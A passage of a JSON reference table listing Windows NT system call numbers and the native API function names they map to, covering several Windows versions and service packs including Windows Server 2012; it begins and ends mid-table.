\"NtSetDriverEntryOrder\", \"342\": \"NtSetEaFile\", \"343\": \"NtSetHighEventPair\", \"344\": \"NtSetHighWaitLowEventPair\", \"345\": \"NtSetInformationDebugObject\", \"346\": \"NtSetInformationEnlistment\", \"347\": \"NtSetInformationJobObject\", \"348\": \"NtSetInformationKey\", \"349\": \"NtSetInformationResourceManager\", \"350\": \"NtSetInformationToken\", \"351\": \"NtSetInformationTransaction\", \"352\": \"NtSetInformationTransactionManager\", \"353\": \"NtSetInformationWorkerFactory\", \"354\": \"NtSetIntervalProfile\", \"355\": \"NtSetIoCompletion\", \"356\": \"NtSetIoCompletionEx\", \"357\": \"NtSetLdtEntries\", \"358\": \"NtSetLowEventPair\", \"359\": \"NtSetLowWaitHighEventPair\", \"360\": \"NtSetQuotaInformationFile\", \"361\": \"NtSetSecurityObject\", \"362\": \"NtSetSystemEnvironmentValue\", \"363\": \"NtSetSystemEnvironmentValueEx\", \"364\": \"NtSetSystemInformation\", \"365\": \"NtSetSystemPowerState\", \"366\": \"NtSetSystemTime\", \"367\": \"NtSetThreadExecutionState\", \"368\": \"NtSetTimerEx\", \"369\": \"NtSetTimerResolution\", \"370\": \"NtSetUuidSeed\", \"371\": \"NtSetVolumeInformationFile\", \"372\": \"NtShutdownSystem\", \"373\": \"NtShutdownWorkerFactory\", \"374\": \"NtSignalAndWaitForSingleObject\", \"375\": \"NtSinglePhaseReject\", \"376\": \"NtStartProfile\", \"377\": \"NtStopProfile\", \"378\": \"NtSuspendProcess\", \"379\": \"NtSuspendThread\", \"380\": \"NtSystemDebugControl\", \"381\": \"NtTerminateJobObject\", \"382\": \"NtTestAlert\", \"383\": \"NtThawRegistry\", \"384\": \"NtThawTransactions\", \"385\": \"NtTraceControl\", \"386\": \"NtTranslateFilePath\", \"387\": \"NtUmsThreadYield\", \"388\": \"NtUnloadDriver\", \"389\": \"NtUnloadKey\", \"390\": \"NtUnloadKey2\", \"391\": \"NtUnloadKeyEx\", \"392\": \"NtUnlockFile\", \"393\": \"NtUnlockVirtualMemory\", \"394\": \"NtVdmControl\", \"395\": \"NtWaitForDebugEvent\", \"396\": \"NtWaitForKeyedEvent\", \"397\": \"NtWaitForWorkViaWorkerFactory\", \"398\": \"NtWaitHighEventPair\", \"399\": \"NtWaitLowEventPair\", \"400\": \"NtWorkerFactoryWorkerReady\"}, \"SP1\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\": \"NtReadFile\", \"4\": \"NtDeviceIoControlFile\", \"5\": \"NtWriteFile\", \"6\": \"NtRemoveIoCompletion\", \"7\": \"NtReleaseSemaphore\", \"8\": \"NtReplyWaitReceivePort\", \"9\": \"NtReplyPort\", \"10\": \"NtSetInformationThread\", \"11\": \"NtSetEvent\", \"12\": \"NtClose\", \"13\": \"NtQueryObject\", \"14\": \"NtQueryInformationFile\", \"15\": \"NtOpenKey\", \"16\": \"NtEnumerateValueKey\", \"17\": \"NtFindAtom\", \"18\": \"NtQueryDefaultLocale\", \"19\": \"NtQueryKey\", \"20\": \"NtQueryValueKey\", \"21\": \"NtAllocateVirtualMemory\", \"22\": \"NtQueryInformationProcess\", \"23\": \"NtWaitForMultipleObjects32\", \"24\": \"NtWriteFileGather\", \"25\": \"NtSetInformationProcess\", \"26\": \"NtCreateKey\", \"27\": \"NtFreeVirtualMemory\", \"28\": \"NtImpersonateClientOfPort\", \"29\": \"NtReleaseMutant\", \"30\": \"NtQueryInformationToken\", \"31\": \"NtRequestWaitReplyPort\", \"32\": \"NtQueryVirtualMemory\", \"33\": \"NtOpenThreadToken\", \"34\": \"NtQueryInformationThread\", \"35\": \"NtOpenProcess\", \"36\": \"NtSetInformationFile\", \"37\": \"NtMapViewOfSection\", \"38\": \"NtAccessCheckAndAuditAlarm\", \"39\": \"NtUnmapViewOfSection\", \"40\": \"NtReplyWaitReceivePortEx\", \"41\": \"NtTerminateProcess\", \"42\": \"NtSetEventBoostPriority\", \"43\": \"NtReadFileScatter\", \"44\": \"NtOpenThreadTokenEx\", \"45\": \"NtOpenProcessTokenEx\", \"46\": \"NtQueryPerformanceCounter\", \"47\": \"NtEnumerateKey\", \"48\": \"NtOpenFile\", \"49\": \"NtDelayExecution\", \"50\": \"NtQueryDirectoryFile\", \"51\": \"NtQuerySystemInformation\", \"52\": \"NtOpenSection\", \"53\": \"NtQueryTimer\", \"54\": \"NtFsControlFile\", \"55\": \"NtWriteVirtualMemory\", \"56\": \"NtCloseObjectAuditAlarm\", \"57\": \"NtDuplicateObject\", \"58\": \"NtQueryAttributesFile\", \"59\": \"NtClearEvent\", \"60\": \"NtReadVirtualMemory\", \"61\": \"NtOpenEvent\", \"62\": \"NtAdjustPrivilegesToken\", \"63\": \"NtDuplicateToken\", \"64\": \"NtContinue\", \"65\": \"NtQueryDefaultUILanguage\", \"66\": \"NtQueueApcThread\", \"67\": \"NtYieldExecution\", \"68\": \"NtAddAtom\", \"69\": \"NtCreateEvent\", \"70\": \"NtQueryVolumeInformationFile\", \"71\": \"NtCreateSection\", \"72\": \"NtFlushBuffersFile\", \"73\": \"NtApphelpCacheControl\", \"74\": \"NtCreateProcessEx\", \"75\": \"NtCreateThread\", \"76\": \"NtIsProcessInJob\", \"77\": \"NtProtectVirtualMemory\", \"78\": \"NtQuerySection\", \"79\": \"NtResumeThread\", \"80\": \"NtTerminateThread\", \"81\": \"NtReadRequestData\", \"82\": \"NtCreateFile\", \"83\": \"NtQueryEvent\", \"84\": \"NtWriteRequestData\", \"85\": \"NtOpenDirectoryObject\", \"86\": \"NtAccessCheckByTypeAndAuditAlarm\", \"87\": \"NtQuerySystemTime\", \"88\": \"NtWaitForMultipleObjects\", \"89\": \"NtSetInformationObject\", \"90\": \"NtCancelIoFile\", \"91\": \"NtTraceEvent\", \"92\": \"NtPowerInformation\", \"93\": \"NtSetValueKey\", \"94\": \"NtCancelTimer\", \"95\": \"NtSetTimer\", \"96\": \"NtAcceptConnectPort\", \"97\": \"NtAccessCheck\", \"98\": \"NtAccessCheckByType\", \"99\": \"NtAccessCheckByTypeResultList\", \"100\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"102\": \"NtAddBootEntry\", \"103\": \"NtAddDriverEntry\", \"104\": \"NtAdjustGroupsToken\", \"105\": \"NtAlertResumeThread\", \"106\": \"NtAlertThread\", \"107\": \"NtAllocateLocallyUniqueId\", \"108\": \"NtAllocateReserveObject\", \"109\": \"NtAllocateUserPhysicalPages\", \"110\": \"NtAllocateUuids\", \"111\": \"NtAlpcAcceptConnectPort\", \"112\": \"NtAlpcCancelMessage\", \"113\": \"NtAlpcConnectPort\", \"114\": \"NtAlpcCreatePort\", \"115\": \"NtAlpcCreatePortSection\", \"116\": \"NtAlpcCreateResourceReserve\", \"117\": \"NtAlpcCreateSectionView\", \"118\": \"NtAlpcCreateSecurityContext\", \"119\": \"NtAlpcDeletePortSection\", \"120\": \"NtAlpcDeleteResourceReserve\", \"121\": \"NtAlpcDeleteSectionView\", \"122\": \"NtAlpcDeleteSecurityContext\", \"123\": \"NtAlpcDisconnectPort\", \"124\": \"NtAlpcImpersonateClientOfPort\", \"125\": \"NtAlpcOpenSenderProcess\", \"126\": \"NtAlpcOpenSenderThread\", \"127\": \"NtAlpcQueryInformation\", \"128\": \"NtAlpcQueryInformationMessage\", \"129\": \"NtAlpcRevokeSecurityContext\", \"130\": \"NtAlpcSendWaitReceivePort\", \"131\": \"NtAlpcSetInformation\", \"132\": \"NtAreMappedFilesTheSame\", \"133\": \"NtAssignProcessToJobObject\", \"134\": \"NtCancelIoFileEx\", \"135\": \"NtCancelSynchronousIoFile\", \"136\": \"NtCommitComplete\", \"137\": \"NtCommitEnlistment\", \"138\": \"NtCommitTransaction\", \"139\": \"NtCompactKeys\", \"140\": \"NtCompareTokens\", \"141\": \"NtCompleteConnectPort\", \"142\": \"NtCompressKey\", \"143\": \"NtConnectPort\", \"144\": \"NtCreateDebugObject\", \"145\": \"NtCreateDirectoryObject\", \"146\": \"NtCreateEnlistment\", \"147\": \"NtCreateEventPair\", \"148\": \"NtCreateIoCompletion\", \"149\": \"NtCreateJobObject\", \"150\": \"NtCreateJobSet\", \"151\": \"NtCreateKeyTransacted\", \"152\": \"NtCreateKeyedEvent\", \"153\": \"NtCreateMailslotFile\", \"154\": \"NtCreateMutant\", \"155\": \"NtCreateNamedPipeFile\", \"156\": \"NtCreatePagingFile\", \"157\": \"NtCreatePort\", \"158\": \"NtCreatePrivateNamespace\", \"159\": \"NtCreateProcess\", \"160\": \"NtCreateProfile\", \"161\": \"NtCreateProfileEx\", \"162\": \"NtCreateResourceManager\", \"163\": \"NtCreateSemaphore\", \"164\": \"NtCreateSymbolicLinkObject\", \"165\": \"NtCreateThreadEx\", \"166\": \"NtCreateTimer\", \"167\": \"NtCreateToken\", \"168\": \"NtCreateTransaction\", \"169\": \"NtCreateTransactionManager\", \"170\": \"NtCreateUserProcess\", \"171\": \"NtCreateWaitablePort\", \"172\": \"NtCreateWorkerFactory\", \"173\": \"NtDebugActiveProcess\", \"174\": \"NtDebugContinue\", \"175\": \"NtDeleteAtom\", \"176\": \"NtDeleteBootEntry\", \"177\": \"NtDeleteDriverEntry\", \"178\": \"NtDeleteFile\", \"179\": \"NtDeleteKey\", \"180\": \"NtDeleteObjectAuditAlarm\", \"181\": \"NtDeletePrivateNamespace\", \"182\": \"NtDeleteValueKey\", \"183\": \"NtDisableLastKnownGood\", \"184\": \"NtDisplayString\", \"185\": \"NtDrawText\", \"186\": \"NtEnableLastKnownGood\", \"187\": \"NtEnumerateBootEntries\", \"188\": \"NtEnumerateDriverEntries\", \"189\": \"NtEnumerateSystemEnvironmentValuesEx\", \"190\": \"NtEnumerateTransactionObject\", \"191\": \"NtExtendSection\", \"192\": \"NtFilterToken\", \"193\": \"NtFlushInstallUILanguage\", \"194\": \"NtFlushInstructionCache\", \"195\": \"NtFlushKey\", \"196\": \"NtFlushProcessWriteBuffers\", \"197\": \"NtFlushVirtualMemory\", \"198\": \"NtFlushWriteBuffer\", \"199\": \"NtFreeUserPhysicalPages\", \"200\": \"NtFreezeRegistry\", \"201\": \"NtFreezeTransactions\", \"202\": \"NtGetContextThread\", \"203\": \"NtGetCurrentProcessorNumber\", \"204\": \"NtGetDevicePowerState\", \"205\": \"NtGetMUIRegistryInfo\", \"206\": \"NtGetNextProcess\", \"207\": \"NtGetNextThread\", \"208\": \"NtGetNlsSectionPtr\", \"209\": \"NtGetNotificationResourceManager\", \"210\": \"NtGetPlugPlayEvent\", \"211\": \"NtGetWriteWatch\", \"212\": \"NtImpersonateAnonymousToken\", \"213\": \"NtImpersonateThread\", \"214\": \"NtInitializeNlsFiles\", \"215\": \"NtInitializeRegistry\", \"216\": \"NtInitiatePowerAction\", \"217\": \"NtIsSystemResumeAutomatic\", \"218\": \"NtIsUILanguageComitted\", \"219\": \"NtListenPort\", \"220\": \"NtLoadDriver\", \"221\": \"NtLoadKey\", \"222\": \"NtLoadKey2\", \"223\": \"NtLoadKeyEx\", \"224\": \"NtLockFile\", \"225\": \"NtLockProductActivationKeys\", \"226\": \"NtLockRegistryKey\", \"227\": \"NtLockVirtualMemory\", \"228\": \"NtMakePermanentObject\", \"229\": \"NtMakeTemporaryObject\", \"230\": \"NtMapCMFModule\", \"231\": \"NtMapUserPhysicalPages\", \"232\": \"NtModifyBootEntry\", \"233\": \"NtModifyDriverEntry\", \"234\": \"NtNotifyChangeDirectoryFile\", \"235\": \"NtNotifyChangeKey\", \"236\": \"NtNotifyChangeMultipleKeys\", \"237\": \"NtNotifyChangeSession\", \"238\": \"NtOpenEnlistment\", \"239\": \"NtOpenEventPair\", \"240\": \"NtOpenIoCompletion\", \"241\": \"NtOpenJobObject\", \"242\": \"NtOpenKeyEx\", \"243\": \"NtOpenKeyTransacted\", \"244\": \"NtOpenKeyTransactedEx\", \"245\": \"NtOpenKeyedEvent\", \"246\": \"NtOpenMutant\", \"247\": \"NtOpenObjectAuditAlarm\", \"248\": \"NtOpenPrivateNamespace\", \"249\": \"NtOpenProcessToken\", \"250\": \"NtOpenResourceManager\", \"251\": \"NtOpenSemaphore\", \"252\": \"NtOpenSession\", \"253\": \"NtOpenSymbolicLinkObject\", \"254\": \"NtOpenThread\", \"255\": \"NtOpenTimer\", \"256\": \"NtOpenTransaction\", \"257\": \"NtOpenTransactionManager\", \"258\": \"NtPlugPlayControl\", \"259\": \"NtPrePrepareComplete\", \"260\": \"NtPrePrepareEnlistment\", \"261\": \"NtPrepareComplete\", \"262\": \"NtPrepareEnlistment\", \"263\": \"NtPrivilegeCheck\", \"264\": \"NtPrivilegeObjectAuditAlarm\", \"265\": \"NtPrivilegedServiceAuditAlarm\", \"266\": \"NtPropagationComplete\", \"267\": \"NtPropagationFailed\", \"268\": \"NtPulseEvent\", \"269\": \"NtQueryBootEntryOrder\", \"270\": \"NtQueryBootOptions\", \"271\": \"NtQueryDebugFilterState\", \"272\": \"NtQueryDirectoryObject\", \"273\": \"NtQueryDriverEntryOrder\", \"274\": \"NtQueryEaFile\", \"275\": \"NtQueryFullAttributesFile\", \"276\": \"NtQueryInformationAtom\", \"277\": \"NtQueryInformationEnlistment\", \"278\": \"NtQueryInformationJobObject\", \"279\": \"NtQueryInformationPort\", \"280\": \"NtQueryInformationResourceManager\", \"281\": \"NtQueryInformationTransaction\", \"282\": \"NtQueryInformationTransactionManager\", \"283\": \"NtQueryInformationWorkerFactory\", \"284\": \"NtQueryInstallUILanguage\", \"285\": \"NtQueryIntervalProfile\", \"286\": \"NtQueryIoCompletion\", \"287\": \"NtQueryLicenseValue\", \"288\": \"NtQueryMultipleValueKey\", \"289\": \"NtQueryMutant\", \"290\": \"NtQueryOpenSubKeys\", \"291\": \"NtQueryOpenSubKeysEx\", \"292\": \"NtQueryPortInformationProcess\", \"293\": \"NtQueryQuotaInformationFile\", \"294\": \"NtQuerySecurityAttributesToken\", \"295\": \"NtQuerySecurityObject\", \"296\": \"NtQuerySemaphore\", \"297\": \"NtQuerySymbolicLinkObject\", \"298\": \"NtQuerySystemEnvironmentValue\", \"299\": \"NtQuerySystemEnvironmentValueEx\", \"300\": \"NtQuerySystemInformationEx\", \"301\": \"NtQueryTimerResolution\", \"302\": \"NtQueueApcThreadEx\", \"303\": \"NtRaiseException\", \"304\": \"NtRaiseHardError\", \"305\": \"NtReadOnlyEnlistment\", \"306\": \"NtRecoverEnlistment\", \"307\": \"NtRecoverResourceManager\", \"308\": \"NtRecoverTransactionManager\", \"309\": \"NtRegisterProtocolAddressInformation\", \"310\": \"NtRegisterThreadTerminatePort\", \"311\": \"NtReleaseKeyedEvent\", \"312\": \"NtReleaseWorkerFactoryWorker\", \"313\": \"NtRemoveIoCompletionEx\", \"314\": \"NtRemoveProcessDebug\", \"315\": \"NtRenameKey\", \"316\": \"NtRenameTransactionManager\", \"317\": \"NtReplaceKey\", \"318\": \"NtReplacePartitionUnit\", \"319\": \"NtReplyWaitReplyPort\", \"320\": \"NtRequestPort\", \"321\": \"NtResetEvent\", \"322\": \"NtResetWriteWatch\", \"323\": \"NtRestoreKey\", \"324\": \"NtResumeProcess\", \"325\": \"NtRollbackComplete\", \"326\": \"NtRollbackEnlistment\", \"327\": \"NtRollbackTransaction\", \"328\": \"NtRollforwardTransactionManager\", \"329\": \"NtSaveKey\", \"330\": \"NtSaveKeyEx\", \"331\": \"NtSaveMergedKeys\", \"332\": \"NtSecureConnectPort\", \"333\": \"NtSerializeBoot\", \"334\": \"NtSetBootEntryOrder\", \"335\": \"NtSetBootOptions\", \"336\": \"NtSetContextThread\", \"337\": \"NtSetDebugFilterState\", \"338\": \"NtSetDefaultHardErrorPort\", \"339\": \"NtSetDefaultLocale\", \"340\": \"NtSetDefaultUILanguage\", \"341\": \"NtSetDriverEntryOrder\", \"342\": \"NtSetEaFile\", \"343\": \"NtSetHighEventPair\", \"344\": \"NtSetHighWaitLowEventPair\", \"345\": \"NtSetInformationDebugObject\", \"346\": \"NtSetInformationEnlistment\", \"347\": \"NtSetInformationJobObject\", \"348\": \"NtSetInformationKey\", \"349\": \"NtSetInformationResourceManager\", \"350\": \"NtSetInformationToken\", \"351\": \"NtSetInformationTransaction\", \"352\": \"NtSetInformationTransactionManager\", \"353\": \"NtSetInformationWorkerFactory\", \"354\": \"NtSetIntervalProfile\", \"355\": \"NtSetIoCompletion\", \"356\": \"NtSetIoCompletionEx\", \"357\": \"NtSetLdtEntries\", \"358\": \"NtSetLowEventPair\", \"359\": \"NtSetLowWaitHighEventPair\", \"360\": \"NtSetQuotaInformationFile\", \"361\": \"NtSetSecurityObject\", \"362\": \"NtSetSystemEnvironmentValue\", \"363\": \"NtSetSystemEnvironmentValueEx\", \"364\": \"NtSetSystemInformation\", \"365\": \"NtSetSystemPowerState\", \"366\": \"NtSetSystemTime\", \"367\": \"NtSetThreadExecutionState\", \"368\": \"NtSetTimerEx\", \"369\": \"NtSetTimerResolution\", \"370\": \"NtSetUuidSeed\", \"371\": \"NtSetVolumeInformationFile\", \"372\": \"NtShutdownSystem\", \"373\": \"NtShutdownWorkerFactory\", \"374\": \"NtSignalAndWaitForSingleObject\", \"375\": \"NtSinglePhaseReject\", \"376\": \"NtStartProfile\", \"377\": \"NtStopProfile\", \"378\": \"NtSuspendProcess\", \"379\": \"NtSuspendThread\", \"380\": \"NtSystemDebugControl\", \"381\": \"NtTerminateJobObject\", \"382\": \"NtTestAlert\", \"383\": \"NtThawRegistry\", \"384\": \"NtThawTransactions\", \"385\": \"NtTraceControl\", \"386\": \"NtTranslateFilePath\", \"387\": \"NtUmsThreadYield\", \"388\": \"NtUnloadDriver\", \"389\": \"NtUnloadKey\", \"390\": \"NtUnloadKey2\", \"391\": \"NtUnloadKeyEx\", \"392\": \"NtUnlockFile\", \"393\": \"NtUnlockVirtualMemory\", \"394\": \"NtVdmControl\", \"395\": \"NtWaitForDebugEvent\", \"396\": \"NtWaitForKeyedEvent\", \"397\": \"NtWaitForWorkViaWorkerFactory\", \"398\": \"NtWaitHighEventPair\", \"399\": \"NtWaitLowEventPair\", \"400\": \"NtWorkerFactoryWorkerReady\"}}, \"Windows Server 2012\": {\"SP0\": {\"0\": \"NtWorkerFactoryWorkerReady\", \"1\": \"NtMapUserPhysicalPagesScatter\", \"2\": \"NtWaitForSingleObject\", \"3\": \"NtCallbackReturn\", \"4\": \"NtReadFile\", \"5\": \"NtDeviceIoControlFile\", \"6\": \"NtWriteFile\", \"7\": \"NtRemoveIoCompletion\", \"8\": \"NtReleaseSemaphore\", \"9\": \"NtReplyWaitReceivePort\", \"10\": \"NtReplyPort\", \"11\": \"NtSetInformationThread\", \"12\": \"NtSetEvent\", \"13\": \"NtClose\", \"14\": \"NtQueryObject\", \"15\": \"NtQueryInformationFile\", \"16\": \"NtOpenKey\", \"17\": \"NtEnumerateValueKey\", \"18\": \"NtFindAtom\", \"19\": \"NtQueryDefaultLocale\", \"20\": \"NtQueryKey\", \"21\": \"NtQueryValueKey\", \"22\": \"NtAllocateVirtualMemory\", \"23\": \"NtQueryInformationProcess\", \"24\": \"NtWaitForMultipleObjects32\", \"25\": \"NtWriteFileGather\", \"26\": \"NtSetInformationProcess\", \"27\": \"NtCreateKey\", \"28\": \"NtFreeVirtualMemory\", \"29\": \"NtImpersonateClientOfPort\", \"30\": \"NtReleaseMutant\", \"31\": \"NtQueryInformationToken\", \"32\": \"NtRequestWaitReplyPort\", \"33\": \"NtQueryVirtualMemory\", \"34\": \"NtOpenThreadToken\", \"35\": \"NtQueryInformationThread\", \"36\": \"NtOpenProcess\", \"37\": \"NtSetInformationFile\", \"38\": \"NtMapViewOfSection\", \"39\": \"NtAccessCheckAndAuditAlarm\", \"40\": \"NtUnmapViewOfSection\", \"41\": \"NtReplyWaitReceivePortEx\", \"42\": \"NtTerminateProcess\", \"43\": \"NtSetEventBoostPriority\", \"44\": \"NtReadFileScatter\", \"45\": \"NtOpenThreadTokenEx\", \"46\": \"NtOpenProcessTokenEx\", \"47\": \"NtQueryPerformanceCounter\", \"48\": \"NtEnumerateKey\", \"49\": \"NtOpenFile\", \"50\": \"NtDelayExecution\", \"51\": \"NtQueryDirectoryFile\", \"52\": \"NtQuerySystemInformation\", \"53\": \"NtOpenSection\", \"54\": \"NtQueryTimer\", \"55\": \"NtFsControlFile\", \"56\": \"NtWriteVirtualMemory\", \"57\": \"NtCloseObjectAuditAlarm\", \"58\": \"NtDuplicateObject\", \"59\": \"NtQueryAttributesFile\", \"60\": \"NtClearEvent\", \"61\": \"NtReadVirtualMemory\", \"62\": \"NtOpenEvent\", \"63\": \"NtAdjustPrivilegesToken\", \"64\": \"NtDuplicateToken\", \"65\": \"NtContinue\", \"66\": \"NtQueryDefaultUILanguage\", \"67\": \"NtQueueApcThread\", \"68\": \"NtYieldExecution\", \"69\": \"NtAddAtom\", \"70\": \"NtCreateEvent\", \"71\": \"NtQueryVolumeInformationFile\", \"72\": \"NtCreateSection\", \"73\": \"NtFlushBuffersFile\", \"74\": \"NtApphelpCacheControl\", \"75\": \"NtCreateProcessEx\", \"76\": \"NtCreateThread\", \"77\": \"NtIsProcessInJob\", \"78\": \"NtProtectVirtualMemory\", \"79\": \"NtQuerySection\", \"80\": \"NtResumeThread\", \"81\": \"NtTerminateThread\", \"82\": \"NtReadRequestData\", \"83\": \"NtCreateFile\", \"84\": \"NtQueryEvent\", \"85\": \"NtWriteRequestData\", \"86\": \"NtOpenDirectoryObject\", \"87\": \"NtAccessCheckByTypeAndAuditAlarm\", \"88\": \"NtQuerySystemTime\", \"89\": \"NtWaitForMultipleObjects\", \"90\": \"NtSetInformationObject\", \"91\": \"NtCancelIoFile\", \"92\": \"NtTraceEvent\", \"93\": \"NtPowerInformation\", \"94\": \"NtSetValueKey\", \"95\": \"NtCancelTimer\", \"96\": \"NtSetTimer\", \"97\": \"NtAcceptConnectPort\", \"98\": \"NtAccessCheck\", \"99\": \"NtAccessCheckByType\", \"100\": \"NtAccessCheckByTypeResultList\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"102\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"103\": \"NtAddAtomEx\", \"104\": \"NtAddBootEntry\", \"105\": \"NtAddDriverEntry\", \"106\": \"NtAdjustGroupsToken\", \"107\": \"NtAdjustTokenClaimsAndDeviceGroups\", \"108\": \"NtAlertResumeThread\", \"109\": \"NtAlertThread\", \"110\": \"NtAlertThreadByThreadId\", \"111\": \"NtAllocateLocallyUniqueId\", \"112\": \"NtAllocateReserveObject\", \"113\": \"NtAllocateUserPhysicalPages\", \"114\": \"NtAllocateUuids\", \"115\": \"NtAlpcAcceptConnectPort\", \"116\": \"NtAlpcCancelMessage\", \"117\": \"NtAlpcConnectPort\", \"118\": \"NtAlpcConnectPortEx\", \"119\": \"NtAlpcCreatePort\", \"120\": \"NtAlpcCreatePortSection\", \"121\": \"NtAlpcCreateResourceReserve\", \"122\": \"NtAlpcCreateSectionView\", \"123\": \"NtAlpcCreateSecurityContext\", \"124\": \"NtAlpcDeletePortSection\", \"125\": \"NtAlpcDeleteResourceReserve\", \"126\": \"NtAlpcDeleteSectionView\", \"127\": \"NtAlpcDeleteSecurityContext\", \"128\": \"NtAlpcDisconnectPort\", \"129\": \"NtAlpcImpersonateClientOfPort\", \"130\": \"NtAlpcOpenSenderProcess\", \"131\": \"NtAlpcOpenSenderThread\", \"132\": \"NtAlpcQueryInformation\", \"133\": \"NtAlpcQueryInformationMessage\", \"134\": \"NtAlpcRevokeSecurityContext\", \"135\": \"NtAlpcSendWaitReceivePort\", \"136\": \"NtAlpcSetInformation\", \"137\": \"NtAreMappedFilesTheSame\", \"138\": \"NtAssignProcessToJobObject\", \"139\": \"NtAssociateWaitCompletionPacket\", \"140\": \"NtCancelIoFileEx\", \"141\": \"NtCancelSynchronousIoFile\", \"142\": \"NtCancelWaitCompletionPacket\", \"143\": \"NtCommitComplete\", \"144\": \"NtCommitEnlistment\", \"145\": \"NtCommitTransaction\", \"146\": \"NtCompactKeys\", \"147\": \"NtCompareTokens\", \"148\": \"NtCompleteConnectPort\", \"149\": \"NtCompressKey\", \"150\": \"NtConnectPort\", \"151\": \"NtCreateDebugObject\", \"152\": \"NtCreateDirectoryObject\", \"153\": \"NtCreateDirectoryObjectEx\", \"154\": \"NtCreateEnlistment\", \"155\": \"NtCreateEventPair\", \"156\": \"NtCreateIRTimer\", \"157\": \"NtCreateIoCompletion\", \"158\": \"NtCreateJobObject\", \"159\": \"NtCreateJobSet\", \"160\": \"NtCreateKeyTransacted\", \"161\": \"NtCreateKeyedEvent\", \"162\": \"NtCreateLowBoxToken\", \"163\": \"NtCreateMailslotFile\", \"164\": \"NtCreateMutant\", \"165\": \"NtCreateNamedPipeFile\", \"166\": \"NtCreatePagingFile\", \"167\": \"NtCreatePort\", \"168\": \"NtCreatePrivateNamespace\", \"169\": \"NtCreateProcess\", \"170\": \"NtCreateProfile\", \"171\": \"NtCreateProfileEx\", \"172\": \"NtCreateResourceManager\", \"173\": \"NtCreateSemaphore\", \"174\": \"NtCreateSymbolicLinkObject\", \"175\": \"NtCreateThreadEx\", \"176\": \"NtCreateTimer\", \"177\": \"NtCreateToken\", \"178\": \"NtCreateTokenEx\", \"179\": \"NtCreateTransaction\", \"180\": \"NtCreateTransactionManager\", \"181\": \"NtCreateUserProcess\", \"182\": \"NtCreateWaitCompletionPacket\", \"183\": \"NtCreateWaitablePort\", \"184\": \"NtCreateWnfStateName\", \"185\": \"NtCreateWorkerFactory\", \"186\": \"NtDebugActiveProcess\", \"187\": \"NtDebugContinue\", \"188\": \"NtDeleteAtom\", \"189\": \"NtDeleteBootEntry\", \"190\": \"NtDeleteDriverEntry\", \"191\": \"NtDeleteFile\", \"192\": \"NtDeleteKey\", \"193\": \"NtDeleteObjectAuditAlarm\", \"194\": \"NtDeletePrivateNamespace\", \"195\": \"NtDeleteValueKey\", \"196\": \"NtDeleteWnfStateData\", \"197\": \"NtDeleteWnfStateName\", \"198\": \"NtDisableLastKnownGood\", \"199\": \"NtDisplayString\", \"200\": \"NtDrawText\", \"201\": \"NtEnableLastKnownGood\", \"202\": \"NtEnumerateBootEntries\", \"203\": \"NtEnumerateDriverEntries\", \"204\": \"NtEnumerateSystemEnvironmentValuesEx\", \"205\": \"NtEnumerateTransactionObject\", \"206\": \"NtExtendSection\", \"207\": \"NtFilterBootOption\", \"208\": \"NtFilterToken\", \"209\": \"NtFilterTokenEx\", \"210\": \"NtFlushBuffersFileEx\", \"211\": \"NtFlushInstallUILanguage\", \"212\": \"NtFlushInstructionCache\", \"213\": \"NtFlushKey\", \"214\": \"NtFlushProcessWriteBuffers\", \"215\": \"NtFlushVirtualMemory\", \"216\": \"NtFlushWriteBuffer\", \"217\": \"NtFreeUserPhysicalPages\", \"218\": \"NtFreezeRegistry\", \"219\": \"NtFreezeTransactions\", \"220\": \"NtGetCachedSigningLevel\", \"221\": \"NtGetContextThread\", \"222\": \"NtGetCurrentProcessorNumber\", \"223\": \"NtGetDevicePowerState\", \"224\": \"NtGetMUIRegistryInfo\", \"225\": \"NtGetNextProcess\", \"226\": \"NtGetNextThread\", \"227\": \"NtGetNlsSectionPtr\", \"228\": \"NtGetNotificationResourceManager\", \"229\": \"NtGetWriteWatch\", \"230\": \"NtImpersonateAnonymousToken\", \"231\": \"NtImpersonateThread\", \"232\": \"NtInitializeNlsFiles\", \"233\": \"NtInitializeRegistry\", \"234\": \"NtInitiatePowerAction\", \"235\": \"NtIsSystemResumeAutomatic\", \"236\": \"NtIsUILanguageComitted\", \"237\": \"NtListenPort\", \"238\": \"NtLoadDriver\", \"239\": \"NtLoadKey\", \"240\": \"NtLoadKey2\", \"241\": \"NtLoadKeyEx\", \"242\": \"NtLockFile\", \"243\": \"NtLockProductActivationKeys\", \"244\": \"NtLockRegistryKey\", \"245\": \"NtLockVirtualMemory\", \"246\": \"NtMakePermanentObject\", \"247\": \"NtMakeTemporaryObject\", \"248\": \"NtMapCMFModule\", \"249\": \"NtMapUserPhysicalPages\", \"250\": \"NtModifyBootEntry\", \"251\": \"NtModifyDriverEntry\", \"252\": \"NtNotifyChangeDirectoryFile\", \"253\": \"NtNotifyChangeKey\", \"254\": \"NtNotifyChangeMultipleKeys\", \"255\": \"NtNotifyChangeSession\", \"256\": \"NtOpenEnlistment\", \"257\": \"NtOpenEventPair\", \"258\": \"NtOpenIoCompletion\", \"259\": \"NtOpenJobObject\", \"260\": \"NtOpenKeyEx\", \"261\": \"NtOpenKeyTransacted\", \"262\": \"NtOpenKeyTransactedEx\", \"263\": \"NtOpenKeyedEvent\", \"264\": \"NtOpenMutant\", \"265\": \"NtOpenObjectAuditAlarm\", \"266\": \"NtOpenPrivateNamespace\", \"267\": \"NtOpenProcessToken\", \"268\": \"NtOpenResourceManager\", \"269\": \"NtOpenSemaphore\", \"270\": \"NtOpenSession\", \"271\": \"NtOpenSymbolicLinkObject\", \"272\": \"NtOpenThread\", \"273\": \"NtOpenTimer\", \"274\": \"NtOpenTransaction\", \"275\": \"NtOpenTransactionManager\", \"276\": \"NtPlugPlayControl\", \"277\": \"NtPrePrepareComplete\", \"278\": \"NtPrePrepareEnlistment\", \"279\": \"NtPrepareComplete\", \"280\": \"NtPrepareEnlistment\", \"281\": \"NtPrivilegeCheck\", \"282\": \"NtPrivilegeObjectAuditAlarm\", \"283\": \"NtPrivilegedServiceAuditAlarm\", \"284\": \"NtPropagationComplete\", \"285\": \"NtPropagationFailed\", \"286\": \"NtPulseEvent\", \"287\": \"NtQueryBootEntryOrder\", \"288\": \"NtQueryBootOptions\", \"289\": 